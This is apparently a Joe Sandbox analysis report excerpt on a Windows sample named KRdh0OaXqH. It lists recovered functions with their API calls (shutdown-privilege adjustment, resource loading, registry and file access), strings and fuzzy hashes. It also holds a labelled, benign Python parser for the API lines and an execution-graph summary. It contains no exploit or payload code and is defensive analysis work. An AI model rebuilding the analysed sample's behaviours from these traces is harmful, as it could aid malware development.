• Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
• String ID: SeShutdownPrivilege
• API String ID: 107509674-3733053543
• Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
• Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
• Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
• Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
APIs
• FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
• SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
• LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
• LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
Memory Dump Source
• Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
• Opcode ID: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
• Instruction ID: ed04ed1443b666af2c347742ca0221af59beed1f1180006ed42e296f861e82c7
• Opcode Fuzzy Hash: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
• Instruction Fuzzy Hash: ECE07EA0B483562AFA6076FB08C2B2A018C4BA671DF40003BB701B92C3DEBD8C14856E
APIs
• GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
Memory Dump Source
• Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
• Instruction ID: 297a7c39c0825e6b478cba46507f56ab37b47465b1590baa0f4eee863dd3b982
• Opcode Fuzzy Hash: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
• Instruction Fuzzy Hash: AED05EA630E6502AE21051AB2D85EBB4A9CCEC5BA4F18407FF648D7242D6248C069B76
APIs
• GetSystemTime.KERNEL32(?), ref: 004026CE
Memory Dump Source
• Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: SystemTime
• String ID:
• API String ID: 2656138-0
• Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
• Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
• Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
• Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                                            APIs
                                                                                            • GetVersionExA.KERNEL32(?,004065E0,00000000,004065EE,?,?,?,?,?,00409C65), ref: 00405CF2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Version
                                                                                            • String ID:
                                                                                            • API String ID: 1889659487-0
                                                                                            • Opcode ID: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                                            • Instruction ID: 3c95a3e10eaf3ff9c271e05f7503c1a51fdcfb4de7972086e3eff1de8b037954
                                                                                            • Opcode Fuzzy Hash: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                                            • Instruction Fuzzy Hash: FDC012A040070186D7109B31EC02B1672D4AB44310F440539AEA4953C2E73C80018A5A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                            • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                                            • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                            • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressCloseHandleModuleProc
                                                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                            • API String ID: 4190037839-2401316094
                                                                                            • Opcode ID: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                                            • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                            • Opcode Fuzzy Hash: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                                            • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                            • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                            • String ID:
                                                                                            • API String ID: 1694776339-0
                                                                                            • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                            • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                            • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                            • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                            APIs
                                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
                                                                                              • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                              • Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLocale$DefaultSystem
                                                                                            • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                            • API String ID: 1044490935-665933166
                                                                                            • Opcode ID: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                                            • Instruction ID: af1252b4c964b6680b9f9af4a0d1ea0fc67f86ffa9d2e4d8722b1cefb330e960
                                                                                            • Opcode Fuzzy Hash: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                                            • Instruction Fuzzy Hash: 25515334B04548ABDB00EBA59C91A9F776AEB89304F50947BB504BB3C6CA3DCE059B5C
                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                            • LocalFree.KERNEL32(0078F830,00000000,00401AB4), ref: 00401A1B
                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,0078F830,00000000,00401AB4), ref: 00401A3A
                                                                                            • LocalFree.KERNEL32(00790830,?,00000000,00008000,0078F830,00000000,00401AB4), ref: 00401A79
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                            • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 3782394904-0
                                                                                            • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                            • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                            • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                            • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                            APIs
                                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                            • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExitMessageProcess
                                                                                            • String ID: Error$Runtime error at 00000000$9@
                                                                                            • API String ID: 1220098344-1503883590
                                                                                            • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                            • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                            • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                            • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                            • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$AllocString
                                                                                            • String ID:
                                                                                            • API String ID: 262959230-0
                                                                                            • Opcode ID: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                                            • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                            • Opcode Fuzzy Hash: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                                            • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
                                                                                            • GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CommandHandleLineModule
                                                                                            • String ID: U1hd.@$`&w
                                                                                            • API String ID: 2123368496-2514248593
                                                                                            • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                            • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                            • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                            • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                            APIs
                                                                                            • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                            • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                            • String ID:
                                                                                            • API String ID: 730355536-0
                                                                                            • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                                            • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                            • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                                            • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                                            APIs
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue
                                                                                            • String ID: )q@
                                                                                            • API String ID: 3660427363-2284170586
                                                                                            • Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                                            • Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
                                                                                            • Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                                            • Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99
                                                                                            APIs
                                                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
                                                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
                                                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
                                                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastSleep
                                                                                            • String ID:
                                                                                            • API String ID: 1458359878-0
                                                                                            • Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                                            • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                            • Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                                            • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9
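                                                                                             The "APIs" entries in the function listings above all share one shape: `Name.MODULE(token, token, ...), ref: ADDRESS`, where `?` marks a value the sandbox could not resolve and the address is the call site inside the image loaded at 00400000 (see "Offset: 00400000, based on PE: true"). The following Python parser is an added example and is not part of the Joe Sandbox report: it turns these lines into records, pulls out the resolved hex values, converts each call site to an RVA for pivoting into the dump in IDA, and groups call sites by MODULE!Api. The sample text is the six API lines copied from the listings above; the page does not say whether every printed token is a true parameter or just a stack slot at the call site, so treating them uniformly as tokens is an assumption.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Shape of one "APIs" line in the report, e.g. "• Sleep.KERNEL32(?,?,0000000D), ref: 004094F7"
API_LINE = re.compile(
    r"^\s*•?\s*(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"\((?P<args>[^()]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{1,16})\s*$"
)
HEX_TOKEN = re.compile(r"^[0-9A-Fa-f]{1,8}$")

IMAGE_BASE = 0x00400000  # "Offset: 00400000, based on PE: true" in the dump header


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]  # tokens exactly as printed; "?" means unresolved
    ref: int               # virtual address of the call site


def parse_api_lines(text: str) -> List[ApiCall]:
    """Extract every API line from a block of report text; all other lines are ignored."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw.strip() else ()
        calls.append(ApiCall(m.group("api"), m.group("module").upper(), args, int(m.group("ref"), 16)))
    return calls


def resolved_values(call: ApiCall) -> List[int]:
    """Hex tokens the sandbox resolved, skipping '?'. Assumption: every printed token is a
    stack slot at the call site, so not all of them are necessarily true parameters."""
    return [int(a, 16) for a in call.args if HEX_TOKEN.match(a)]


def rva(call: ApiCall, base: int = IMAGE_BASE) -> int:
    """Call-site RVA relative to the image base, for locating it in the dump or in IDA."""
    return call.ref - base


def call_sites(calls: List[ApiCall]) -> Dict[str, List[int]]:
    """Group call-site addresses by MODULE!Api, deduplicated and sorted."""
    grouped: Dict[str, set] = defaultdict(set)
    for c in calls:
        grouped[f"{c.module}!{c.api}"].add(c.ref)
    return {k: sorted(v) for k, v in grouped.items()}


# Sample input: the six API lines copied from the function listings above.
SAMPLE = """
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
• Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
• Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
• GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
• GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
"""

if __name__ == "__main__":
    for c in parse_api_lines(SAMPLE):
        values = [hex(v) for v in resolved_values(c)]
        print(f"{c.module}!{c.api:<18} ref={c.ref:08X} rva={rva(c):06X} values={values}")
```

                                                                                             Feeding a whole report section to `parse_api_lines` is safe because non-matching lines (the dump headers, fuzzy hashes, "Strings") are skipped; the grouped call sites make it easy to see that the two `Sleep` and two `GetLastError` calls sit within 0x30 bytes of each other in the same routine.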

                                                                                            Execution Graph

                                                                                             Execution Coverage: 14.4%
                                                                                             Dynamic/Decrypted Code Coverage: 0.4%
                                                                                             Signature Coverage: 4.5%
                                                                                             Total number of Nodes: 2000
                                                                                             Total number of Limit Nodes: 91
                                                                                             execution_graph: [interactive call graph of the analysed process; nodes are function addresses labelled with the Windows APIs they call, edges are call relationships]
